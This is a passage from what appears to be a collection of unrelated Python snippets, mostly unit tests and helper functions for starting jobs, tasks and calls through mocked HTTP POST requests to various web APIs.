content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_api_post(httpretty, new_job):\n url = 'https://salesforce/services/async/34.0/job/THEJOBID'\n httpretty.register_uri('POST', url, status=201, body=b'some xml and stuff')\n response = new_job.request('post', url, data=b'stuff')\n assert response == b'some xml and stuff'\n assert httpretty.last_request().body == b'stuff'", "def test_post_job(self):\n body = UnitTesterJobCreateReq()\n response = self.client.open(\n '/v1/job',\n method='POST',\n data=json.dumps(body),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_start_post(self):\n StartConfiguration = StartConfiguration()\n response = self.client.open(\n '/start',\n method='POST',\n data=json.dumps(StartConfiguration),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_creating_a_job(created_job, bulk_request):\n assert created_job.job == 'THEJOBID'\n assert created_job.job_url == 'https://salesforce/services/async/34.0/job/THEJOBID'\n assert created_job.pending_batches == []\n assert created_job.is_open\n\n bulk_request.assert_called_once_with(\n 'post',\n 'https://salesforce/services/async/34.0/job',\n data=XMLMatcher('''<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <jobInfo xmlns=\"http://www.force.com/2009/06/asyncapi/dataload\">\n <operation>update</operation>\n <object>Lead</object>\n <contentType>CSV</contentType>\n </jobInfo>\n ''')\n )", "def pytest_runtest_call(self, item):\n if not item.config.option.tc_duration:\n self.detailed_duration[item.nodeid]['call'] = time.time()\n\n if self._buildname is None:\n self.buildname(item.config.env.env_prop)\n if self._buildname is not None and not self._init_session:\n self._sessionstart(item)\n self._init_session = True\n self._send_post_request(item)", "def start_test_run(self, request):\n request.worker.initialize_test_run(request.message.tests,\n request.message.run_data)\n\n return SuccessReply()", "def test_create_startliste(http_service: Any) -> None:\n url = f\"{http_service}/start\"\n with open(\"tests/files/G11KvartStart.json\") as json_file:\n data = json.load(json_file)\n\n headers = {\"content-type\": \"application/json; charset=utf-8\"}\n response = requests.post(url, headers=headers, json=data)\n assert response.status_code == 201", "def testTurbiniaStart(self, mock_create_request):\n mock_create_request.return_value = {\n \"request_id\": \"41483253079448e59685d88f37ab91f7\"\n }\n mock_api_instance = mock.MagicMock()\n mock_api_instance.create_request = mock_create_request\n self.turbinia_processor.requests_api_instance = mock_api_instance\n evidence = {\n \"type\": \"GoogleCloudDisk\",\n \"disk_name\": \"disk-1\",\n \"project\": \"project-1\",\n \"zone\": \"us-central1-f\",\n }\n request_id = self.turbinia_processor.TurbiniaStart(\n evidence=evidence, yara_rules=YARA_RULE)\n self.assertEqual(request_id, \"41483253079448e59685d88f37ab91f7\")", "def test_api_get(httpretty, new_job):\n url = 'https://salesforce/services/async/34.0/job/THEJOBID'\n httpretty.register_uri('GET', url, status=200, body=b'some xml and stuff')\n response = new_job.request('get', url, expected_response=200)\n assert response == b'some xml and stuff'", "def test_call_api_return_only_consolidated_calls(client, start_call_fx, stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n start_call_fx_2 = 
copy(start_call_fx)\n start_call_fx_2['call_id'] = 2\n\n post_data = [start_call_fx, start_call_fx_2, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1", "def test_callback_calls_celery_task(self, rf):\n product = product_factory()\n request = rf.post('/')\n\n url = request.build_absolute_uri(product.get_absolute_url())\n\n with patch('remindme.tasks.send_notification_email.delay') as task:\n product_in_stock_callback(\n self.__class__, product=product, request=request\n )\n task.assert_called_with(product.pk, product.title, url)", "def test_get_job(self):\n response = self.client.open(\n '/v1/job/{id}'.format(id='id_example'),\n method='GET',\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_success_on_post(self, mock_create, mock_msg_mgr):\n\n url = '/%s/jobs/' % self.api\n\n User.objects.create_superuser(username='test', email='[email protected]', password='password')\n\n self.client.login(username='test', password='password',)\n response = self.client.post(url, data=self.json_data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)\n\n result = json.loads(response.content)\n\n # Response should be new v6 job detail response\n self.assertEqual(result['execution'], None)\n self.assertTrue('/%s/jobs/' % self.api in response['location'])", "def test_post(self):\n self.client.force_login(self.john)\n\n with self.subTest(\"Test start task success\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_201_CREATED,\n \"Gamer cant create the task via API!\"\n )\n\n with self.subTest(\"Start the same task again fail\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_409_CONFLICT\n )", "def test_successful(self, mock_create, mock_msg_mgr):\n\n json_data = {\n \"input\" : {\n 'version': '6',\n 'files': {'input_a': [self.source_file.id]},\n 'json': {}\n },\n \"job_type_id\" : self.job_type1.pk\n }\n\n url = '/%s/jobs/' % self.api\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)\n\n result = json.loads(response.content)\n\n #Response should be new v6 job detail response\n self.assertEqual(result['execution'], None)\n self.assertEqual(result['max_tries'], 3)\n self.assertTrue('/%s/jobs/' % self.api in response['location'])\n mock_create.assert_called_once()", "def run_test(server_base_url, delayed_jobs_server_base_path):\n\n print('-------------------------------------------')\n print('Testing the element usage endpoint')\n print('-------------------------------------------')\n print('delayed_jobs_server_base_path: ', delayed_jobs_server_base_path)\n\n url = f'{server_base_url}/frontend_element_usage/register_element_usage'\n\n payload = {\n 'view_name': 'Compound-CompoundNameAndClassification',\n 'view_type': 'CARD',\n 'entity_name': 'Compound'\n }\n\n request = requests.post(url, data=payload)\n\n status_code = request.status_code\n print(f'status_code: {status_code}')\n response_text = request.text\n utils.print_es_response(response_text)\n assert status_code == 200, 'The request 
failed!'", "def start_job(self):\n # POST /jobs/{job_id}/results\n pass", "def test_start_machine(self, pretty_print, owner_api_token):\n machine = setup_data.get('start_machine', {}).get('machine') \\\n or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + \\\n '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(\n api_token=owner_api_token,\n uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(\n api_token=owner_api_token,\n uri=setup_data['amazon_machine_uri'],\n data={'state': 'running', 'actions': {'stop': True}},\n timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')", "def test_post_job_log_export(self):\n job_id = 'job_id_example'\n response = self.client.open(\n '/v1/job/logs',\n method='POST',\n data=json.dumps(job_id),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_run_workflow_by_payload(self):\n full_task_payload = {\n \"workflow_name\" : \"workflow_name\",\n \"input_mappings\" : \"input_mappings\"\n}\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = self.client.open(\n '/run/workflow/',\n method='POST',\n headers=headers,\n data=json.dumps(full_task_payload),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_start_test(self):\n self.protocol.startTest(self.test)\n self.assertEqual(self.io.getvalue(), compat._b(\n \"test: %s\\n\" % self.test.id()))", "def test_create_seed_validation(self):\n\n url = '/%s/job-types/' % self.api\n manifest = copy.deepcopy(job_test_utils.COMPLETE_MANIFEST)\n manifest['job']['name'] = 'validation'\n\n json_data = {\n 'icon_code': 'BEEF',\n 'is_published': True,\n 'docker_image': 'my-new-job-1.0.0-seed:1.0.0',\n 'manifest': manifest,\n 'configuration': self.configuration\n }\n\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)", "def test_request_spartan_grasp(self, *args, **kwargs):\n self.taskRunner.callOnThread(self.request_spartan_grasp, *args, **kwargs)", "def test_tick(requests_mock, test_operator):\n tick_url = (\"https://habitica.com/api/v3/tasks/{}/score/up\"\n \"\".format(\"963e2ced-fa22-4b18-a22b-c423764e26f3\"))\n test_operator.tick_task(\"Test habit\")\n\n assert len(requests_mock.request_history) == 2\n tick_request = requests_mock.request_history[1]\n assert tick_url in tick_request.url", "def test_run_started(self):", "def start(self):\n self.server.request(\"post\", \"/jobs/%s/%s/state\" % (self.sessionid,\n self.name), body=\"1\")\n return True", "def test_create_valid_submission(self):\n with self.client:\n # valid submission registration\n sub_response = register_ok_submission(self, self.token)\n response_data = json.loads(sub_response.data.decode())\n self.assertTrue(response_data['status']=='success')", "def test_call_first_time(self, query_repo_url, get_credentials, valid_revision, get):\n self.assertEquals(\n self.query_api._get_all_jobs(\"try\", \"146071751b1e\"),\n json.loads(JOBS_SCHEDULE))\n\n assert get.call_count == 1\n\n # Test that this fills our caches\n self.assertEquals(\n query_jobs.JOBS_CACHE[(\"try\", \"146071751b1e\")],\n 
json.loads(JOBS_SCHEDULE))", "def test_get_start_form_data(self):\n pass", "def test_task(self, mocker):\n\n tid = 289466\n site = \"mysite\"\n json = self.generate_task_dictionary(tid, state=\"error\")\n url = (\n \"https://cloudapi.acquia.com/v1/\"\n \"sites/prod:{site}/tasks/{tid}.json\".format(tid=tid, site=site)\n )\n\n mocker.register_uri(\"GET\", url, json=json)\n\n task = self.client.site(site).task(tid)\n self.assertEqual(task[\"id\"], tid)\n self.assertEqual(task[\"state\"], \"error\")", "def startTestHook(self):", "def test_start_already_running(self, mock_add_job, mock_get_job):\n mock_get_job.return_value = MagicMock()\n\n result = self.aggregator.start(self.node_id)\n\n self.assertFalse(result)\n self.assertFalse(mock_add_job.called)", "def test_fax_inbound_automation_post(self):\n pass", "def test_start_mdt(self):\n response = self.client.get(reverse('start-mdt', args=[self.sample_type]), follow=True)\n self.assertContains(response, self.proband.gel_id)\n self.assertEqual(response.status_code, 200)", "async def test_launch_400():\n work_queue = asyncio.Queue()\n await work_queue.put(TestData.JOB_TEMPLATE_LAUNCH_PAYLOAD)\n worker = tower_api_worker.TowerApiWorker(TestData.config, None, work_queue)\n with aioresponses() as mocked:\n mocked.post(\n TestData.JOB_TEMPLATE_POST_URL, status=400, body=\"BAD DATA\",\n )\n with pytest.raises(Exception) as excinfo:\n await worker.start()\n assert \"BAD DATA\" in str(excinfo.value)", "def setUp(self):\n self.app = webtest.TestApp(main.app) \n self.batch_id = \"R1HIA55JB5DOQZM8R53OKMCWZ5BEQKUJ\"", "def start_workunit(self, workunit):\r\n pass", "def start_workunit(self, workunit):\r\n pass", "def test_successful_on_get(self):\n\n url = '/%s/jobs/' % self.api\n\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)", "def post(self):\n data = api.payload\n\n try:\n phone_call = PhoneCallStart(\n parser.parse(data[\"start_timestamp\"]),\n data[\"call_id\"],\n data[\"source\"],\n data[\"destination\"]\n )\n except AssertionError as error:\n return error.args, 400\n\n repository.db.session.add(phone_call)\n repository.db.session.commit()\n\n return phone_call, 201", "def run_single_test(self, config):\n path_name = config['path_name']\n for request in config['request']:\n with self.subTest(request=request, test_name=config['test_name']):\n if 'args' in request:\n url = reverse(path_name, kwargs=request['args'])\n else:\n url = reverse(path_name)\n\n query_params = None\n if 'query_params' in request:\n query_params = urlencode(request['query_params'])\n url = '{}?{}'.format(url, query_params)\n\n data = None\n data_format = 'json'\n if 'data' in request:\n data = request['data']\n\n if 'data_format' in request:\n data_format = request['data_format']\n\n response_check = None\n if 'response_check' in request:\n response_check = request['response_check']\n\n self.call_api(\n url,\n data,\n self.tokens[request['user']],\n request['status'],\n config['type'],\n data_format=data_format,\n response_check=response_check)", "def test_start(http_service: Any) -> None:\n url = f\"{http_service}/start\"\n response = requests.get(url)\n\n assert response.status_code == 200\n assert response.headers[\"content-type\"] == \"text/html; charset=utf-8\"\n\n assert len(response.text) > 0", "def test_create_job(self):\n engine = Engine(self.config_file, self.api_token)\n\n engine.create_job()\n\n assert engine.ingest_job_id == 23", "def test_run_prefix__success(mocker):\n runner = CliRunner()\n 
mocked_login = mocker.patch.object(APIClient, \"login\", return_value=None)\n mocked_get_sample_sheet = mocker.patch.object(\n APIClient,\n \"get_sample_sheet\",\n return_value=SampleSheet(**MOCKED_UPLOADS),\n )\n mocked_add_samples_to_project = mocker.patch.object(\n APIClient,\n \"add_samples_to_project\",\n return_value=UploadSamples(**{}),\n )\n\n res = runner.invoke(\n run_prefix,\n [\n str(uuid4()),\n \"gncv://batch\",\n \"--email\",\n \"[email protected]\",\n \"--password\",\n \"123\",\n ],\n )\n assert res.exit_code == 0\n mocked_login.assert_called_once()\n mocked_get_sample_sheet.assert_called_once()\n mocked_add_samples_to_project.assert_called_once()\n assert \"Number of samples assigned to the project\" in res.output\n assert \"Assigning metadata to the uploaded samples.\" not in res.output", "def startTestRun(self):", "def start():\n url = request.form['url']\n tag_task = parse_html_tags.delay(url)\n return jsonify({'taskid': tag_task.id}), 202, {'Location': url_for('task_state', task_id=tag_task.id)}", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device\n response = self.client.post(self.incoming_url, call_data)\n\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.ios_app,\n )\n call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def test_cron(mock_post, test_operator, header_fx):\n test_operator.cron()\n mock_post.assert_called_with(\"https://habitica.com/api/v3/cron\",\n headers=header_fx)", "def worker_logstart(self, node, nodeid, location):\n self.config.hook.pytest_runtest_logstart(nodeid=nodeid, location=location)", "def start(coordinator_url: str, use_case: UseCase):\n\n raise NotImplementedError", "def test_ref_id(self):\n template = self._set_template(self.lb_template)\n rsrc, fake_lb = self._mock_loadbalancer(template,\n self.lb_name,\n self.expected_body)\n self.m.ReplayAll()\n scheduler.TaskRunner(rsrc.create)()\n self.m.VerifyAll()\n\n self.assertEqual(rsrc.resource_id, rsrc.FnGetRefId())", "def post(self):\n data = api.payload\n\n try:\n phone_call_start = repository.find_start_call_by_call_id(data[\"call_id\"])\n except NoResultFound:\n return 'no call found by specified call id', 404\n\n phone_call_start.end_timestamp = parser.parse(data[\"end_timestamp\"]).replace(tzinfo=None)\n\n # repository.session.add(phone_call_start)\n repository.db.session.commit()\n\n return phone_call_start", "def startTest(asset):", "def test_success_start(self, put, get, auth, circuits_app, fn_cloud_foundry_action, 
fn_cloud_foundry_applications):\n auth.return_value = AuthenticationMock()\n put.return_value = give_response(201, GUIDS_MOCK[\"resources\"][0])\n get.return_value = give_response(200, GUIDS_MOCK)\n\n function_params = {\n \"fn_cloud_foundry_action\": fn_cloud_foundry_action,\n \"fn_cloud_foundry_applications\": fn_cloud_foundry_applications\n }\n results = call_fn_cloud_foundry_manage_applications_function(circuits_app, function_params)\n assert results[\"test1\"][\"success\"] == True\n assert results[\"test1\"][\"current_state\"] == \"STARTED\"", "def start(jira_url, jira_username, jira_api_key, jira_project_key, toggl_api_key, toggl_workspace_id, toggl_project_id,\n issue_key):\n click.echo(start_task(jira_url, jira_username, jira_api_key, jira_project_key, toggl_api_key, toggl_workspace_id,\n toggl_project_id, issue_key))", "async def job_start(self, uid, args, env, cwd, port_expected_count,\n forward_stdout=False):\n self._require_running()\n if port_expected_count and self._job_start_endpoint is None:\n raise RuntimeError(\n 'cannot run server job: job start endpoint is not set'\n )\n process_env = dict(os.environ)\n # TODO: Make properties case-insensitve, forced uppercase?\n self._extend_with_prefix(\n process_env,\n self._properties,\n self.PREFIX_PROPERTIES\n )\n if port_expected_count:\n self._extend_with_prefix(\n process_env,\n {\n self.PROPERTY_JOB_ENDPOINT: self._job_start_endpoint,\n self.PROPERTY_JOB_ID: str(uid)\n },\n self.PREFIX_PROPERTIES\n )\n process_env.update(env or {})\n\n await self._get_job(uid).start(\n args, process_env, cwd, port_expected_count, forward_stdout\n )\n # TODO: Support job queueing?\n # (and finite amount of job slots on an agent instance)", "def request_training():\n log = logger.new()\n request_content = flask.request.get_json()\n if request_content is None:\n log.error('frontend::train_request::invalid_json')\n flask.abort(415)\n\n training_request = extract_training_request(request_content)\n if training_request is None:\n log.error('frontend::train_request::invalid_request')\n flask.abort(400)\n\n job_id = _database_operations.create_new_job(training_request, Session())\n log.info('frontend::train_request::request_training', job_id=job_id)\n return job_id", "def _StartRequest(self, request_id, manager):\n pending_path = self._GetRequestPathname(request_id, self._PENDING)\n with open(pending_path, 'r') as f:\n request_object = pickle.load(f)\n manager.StartTask(request_id, request_object)\n self._TransitionRequest(request_id, self._PENDING, self._RUNNING)", "def test_launch_deployment(self):\n pass", "def test_job_id(self):\n\n url = '/%s/jobs/?job_id=%s' % (self.api, self.job1.id)\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 1)\n self.assertEqual(result['results'][0]['id'], self.job1.id)", "def test_api_authentication(httpretty, new_job):\n url = 'https://salesforce/services/async/34.0/job/THEJOBID'\n httpretty.register_uri('GET', url, status=200)\n new_job.request('get', url, expected_response=200)\n assert httpretty.last_request().headers['X-SFDC-Session'] == 'the-session-id'", "def test_start_refresh(api: API, account: Account):\n api.candlepin.refresh.return_value = {\"id\": 123456} # type: ignore\n account.start_refresh()\n api.candlepin.refresh.assert_called_once() # type: ignore\n assert account._latest_refresh_job_id == 123456", "def 
test_command_trigger_webhook_post(self):\n pass", "def test_batch(self):\n batch = batch_test_utils.create_batch()\n self.job1.batch_id = batch.id\n self.job1.save()\n\n url = '/%s/jobs/?batch_id=%d' % (self.api, batch.id)\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 1)\n self.assertEqual(result['results'][0]['id'], self.job1.id)", "def test_post_task(self):\n resp = self.app.post('/api/2/inf/esrs',\n headers={'X-Auth': self.token},\n json={'name': \"myESRS\", 'image': \"3.28\", 'network': \"someNetwork\"})\n\n task_id = resp.json['content']['task-id']\n expected = 'asdf-asdf-asdf'\n\n self.assertEqual(task_id, expected)", "def test_run(self, mock):\n mock.return_value = mock_trello_service()\n\n pull_requests = PullRequest.query.all()\n self.assertTrue(len(pull_requests) is 0)\n\n payload = json_fixture('./tests/fixtures/pull_request_opened.json')\n CreatePullRequestCard.delay(\n board_id=default_board_id,\n list_id=default_list_id,\n name='Fake Pull Request',\n payload=payload\n )\n\n # Enqueuing new pull_request `CreatePullRequestCard` should create a\n # `PullRequest` record\n new_pull_requests = PullRequest.query.all()\n self.assertTrue(len(new_pull_requests) is 1)", "def start_master_worker():\n print(\"Starting master worker\")\n r = req.patch(f\"{MASTER_API_URL}/formation/worker\", json=API_PAYLOAD_1, headers=MASTER_API_HEADERS)\n if r.status_code != req.codes.ok:\n print(\"Unable to start the worker dyno on master\")\n print(r.text)\n return False\n #wait a bit for the worker process to start\n print(\"Waiting a bit\")\n time.sleep(10)\n return True", "def test_request(comms):\n kernel_comm, frontend_comm = comms\n\n def handler(a, b):\n return a + b\n\n kernel_comm.register_call_handler('test_request', handler)\n\n res = frontend_comm.remote_call(blocking=True).test_request('a', b='b')\n\n assert res == 'ab'", "def pytest_runtest_logstart(nodeid):\n log.debug(\">>>>>>> START %s >>>>>>>\", nodeid)", "def cb_test( self, ):\r\n # this shows how to run stuff in the helper -- call thru queue, post to queue\r\n self.post_to_queue( \"call\", self.helper_thread.test_test_ports , ( ) )", "def start_flow():\n if request.method == 'GET':\n tel = request.args.get('tel')\n flow = request.args.get('flow')\n to_rp = request.args.get('to')\n if to_rp == \"io\":\n client = io_client\n elif to_rp == \"datos\":\n client = mx_client\n else:\n return jsonify({}), 404\n contact = client.get_contacts(urn=['tel:+52' + tel]).all()\n if contact:\n client.create_flow_start(\n flow=flow,\n contacts=[contact[0].uuid],\n )\n return jsonify({\"Inicio_flow\": \"Si\"}), 201\n return jsonify({\"Inicio_flow\": \"No\"}), 404", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device.\n response = self.client.post(self.incoming_url, call_data)\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.android_app,\n )\n call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'\n\n # Now the device exists, call it again in seperate thread.\n 
thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def start(self, **kwargs):\n return self.client.api.start(self.id, **kwargs)", "async def test_fn_create(app: Quart) -> None:\n test_client = app.test_client()\n response = await test_client.post(\n \"/fn\", json=VALID_TASK_BASIC\n )\n assert response.status_code == 200\n response_json = await response.get_json()\n assert response_json == VALID_TASK_BASIC", "def test_run_prefix__success_with_json(mocker):\n runner = CliRunner()\n mocked_login = mocker.patch.object(APIClient, \"login\", return_value=None)\n mocked_get_sample_sheet = mocker.patch.object(\n APIClient,\n \"get_sample_sheet\",\n return_value=SampleSheet(**MOCKED_UPLOADS),\n )\n mocked_add_samples_to_project = mocker.patch.object(\n APIClient,\n \"add_samples_to_project\",\n return_value=UploadSamples(**{}),\n )\n\n res = runner.invoke(\n run_prefix,\n [\n str(uuid4()),\n \"gncv://batch\",\n \"--metadata-json\",\n '{\"somekey\": \"somevalue\"}',\n \"--email\",\n \"[email protected]\",\n \"--password\",\n \"123\",\n ],\n )\n assert res.exit_code == 0\n mocked_login.assert_called_once()\n mocked_get_sample_sheet.assert_called_once()\n mocked_add_samples_to_project.assert_called_once()\n assert \"Assigning metadata to the uploaded samples.\" in res.output", "def start(self, sessionId, task, contact):\n pass", "def test_create_empty_payload(self):\n response = self.client.post('/routines/', data={})\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)", "def test_successful_configuration(self, mock_create, mock_msg_mgr):\n\n json_data = {\n \"input\" : {\n 'version': '6',\n 'files': {'input_a': [self.source_file.id]},\n 'json': {}\n },\n \"job_type_id\" : self.job_type1.pk,\n \"configuration\" : self.configuration\n }\n\n url = '/%s/jobs/' % self.api\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)\n\n result = json.loads(response.content)\n\n #Response should be new v6 job detail response\n self.assertEqual(result['execution'], None)\n self.assertTrue('/%s/jobs/' % self.api in response['location'])\n mock_create.assert_called_once()", "def test_call(self):\n\n with Client('username', 'password') as client:\n self.setSessionResponse(content='{\"ok\": true}')\n data = client.call(**self.build_parameters)\n self.assertEqual(data, '{\"ok\": true}')", "def start_build(self, build_id):\n pass", "def Start(sliver_name):\n rec = sliver_name\n account.get(rec['name']).start(rec)\n logger.log(\"api_calls: Start %s\"%rec['name'])", "def test_upload_1_generation_shell(self):\n entry = mock.MagicMock()\n device_os = mock.MagicMock()\n families = {\"first_gen\": mock.MagicMock()}\n device_os.families.get.return_value = families\n vendor = mock.MagicMock(get_device_os=mock.MagicMock(return_value=device_os))\n first_gen = families[\"first_gen\"]\n cs_session = mock.MagicMock()\n resource_name = \"test resource name\"\n 
self.networking_handler._upload_resource = mock.MagicMock(return_value=resource_name)\n\n # act\n self.networking_handler.upload(entry=entry,\n vendor=vendor,\n cs_session=cs_session)\n # verify\n self.networking_handler._upload_resource.assert_called_once_with(cs_session=cs_session,\n entry=entry,\n resource_family=first_gen[\"family_name\"],\n resource_model=first_gen[\"model_name\"],\n driver_name=first_gen[\"driver_name\"])", "def test_execute_get_success():\n response_queue = run_get(\n TestData.RECEPTOR_CONFIG,\n json.dumps(TestData.JOB_TEMPLATE_PAYLOAD_SINGLE_PAGE),\n TestData.JOB_TEMPLATE_RESPONSE,\n )\n response = response_queue.get()\n validate_get_response(\n response,\n 200,\n TestData.JOB_TEMPLATE_COUNT,\n [TestData.JOB_TEMPLATE_1, TestData.JOB_TEMPLATE_2],\n )", "def test_starts_returned_async(self):\n from furious.async import Async\n from furious.context._execution import _ExecutionContext\n from furious.processors import run_job\n\n returned_async = Mock(spec=Async)\n\n work = Async(target=_fake_async_returning_target,\n args=[returned_async])\n\n with _ExecutionContext(work):\n run_job()\n\n returned_async.start.assert_called_once_with()", "def start_import_task(clientRequestToken=None, name=None, importUrl=None):\n pass", "def test_add_seed_job_type(self):\n\n url = '/%s/job-types/' % self.api\n manifest = copy.deepcopy(job_test_utils.COMPLETE_MANIFEST)\n manifest['job']['name'] = 'my-new-job'\n\n json_data = {\n 'icon_code': 'BEEF',\n 'is_published': True,\n 'docker_image': 'my-new-job-1.0.0-seed:1.0.0',\n 'manifest': manifest,\n 'configuration': self.configuration\n }\n\n good_setting = {\n 'DB_HOST': 'scale'\n }\n\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)\n self.assertTrue('/%s/job-types/my-new-job/1.0.0/' % self.api in response['location'])\n\n job_type = JobType.objects.filter(name='my-new-job').first()\n\n results = json.loads(response.content)\n self.assertEqual(results['id'], job_type.id)\n self.assertEqual(results['version'], job_type.version)\n self.assertEqual(results['title'], job_type.get_title())\n self.assertEqual(results['revision_num'], job_type.revision_num)\n self.assertEqual(results['revision_num'], 1)\n self.assertIsNone(results['max_scheduled'])\n self.assertEqual(results['configuration']['settings'], good_setting)", "def startexp(proj,exp,nsfilestr,batch=False):\n response=do_method(\"experiment.startexp\",\n {\"proj\":proj,\"exp\":exp,\"nsfilestr\":nsfilestr,\"batch\":batch})\n \n check_response(response)", "def initialize_test(load_generator_dns, first_web_service_dns):\n\n add_ws_string = 'http://{}/autoscaling?dns={}'.format(\n load_generator_dns, first_web_service_dns\n )\n response = None\n while not response or response.status_code != 200:\n try:\n response = requests.get(add_ws_string, timeout = 10)\n except requests.exceptions.RequestException as e:\n print(e)\n time.sleep(1)\n pass \n\n # TODO: return log File name\n return get_test_id(response)", "def setUp(self):\n response = self.client.post('/trainer/create/',\n {\"name\": \"Blue\",\n \"las_name\": \"Oak\"})\n self.trainer_id = response.json()[\"id\"]", "def test_xqueue_callback_success(self):\r\n fake_key = 'fake key'\r\n xqueue_header = json.dumps({'lms_key': fake_key})\r\n data = {\r\n 'xqueue_header': xqueue_header,\r\n 'xqueue_body': 'hello world',\r\n }\r\n\r\n # Patch getmodule to return our mock module\r\n with 
patch('courseware.module_render.find_target_student_module') as get_fake_module:\r\n get_fake_module.return_value = self.mock_module\r\n # call xqueue_callback with our mocked information\r\n request = self.request_factory.post(self.callback_url, data)\r\n render.xqueue_callback(request, self.course_key, self.mock_user.id, self.mock_module.id, self.dispatch)\r\n\r\n # Verify that handle ajax is called with the correct data\r\n request.POST['queuekey'] = fake_key\r\n self.mock_module.handle_ajax.assert_called_once_with(self.dispatch, request.POST)", "def testPostEndpoints(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # Register an importer\n importer = ImportListener()\n context.register_service(pelix.remote.SERVICE_IMPORT_ENDPOINT_LISTENER,\n importer,\n {pelix.remote.PROP_REMOTE_CONFIGS_SUPPORTED:\n exporter.configs[0]})\n\n # Register a service\n context.register_service(\"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Get its representation\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n self.assertEqual(status, 200)\n\n # Change its UID and framework UID\n endpoint_data = json.loads(response)\n endpoint_data['uid'] = 'other-uid'\n endpoint_data['name'] = 'other-name'\n endpoint_data['sender'] = 'other-framework'\n\n # Send the 'discovered' event\n status, response = self._http_post(\"endpoints\",\n json.dumps([endpoint_data]))\n self.assertEqual(status, 200)\n self.assertEqual(response, 'OK')\n\n # Ensure that the service has been registered\n imported_endpoint = importer.endpoints[endpoint_data['uid']]\n self.assertEqual(imported_endpoint.uid, endpoint_data['uid'])\n self.assertEqual(imported_endpoint.framework, endpoint_data['sender'])\n 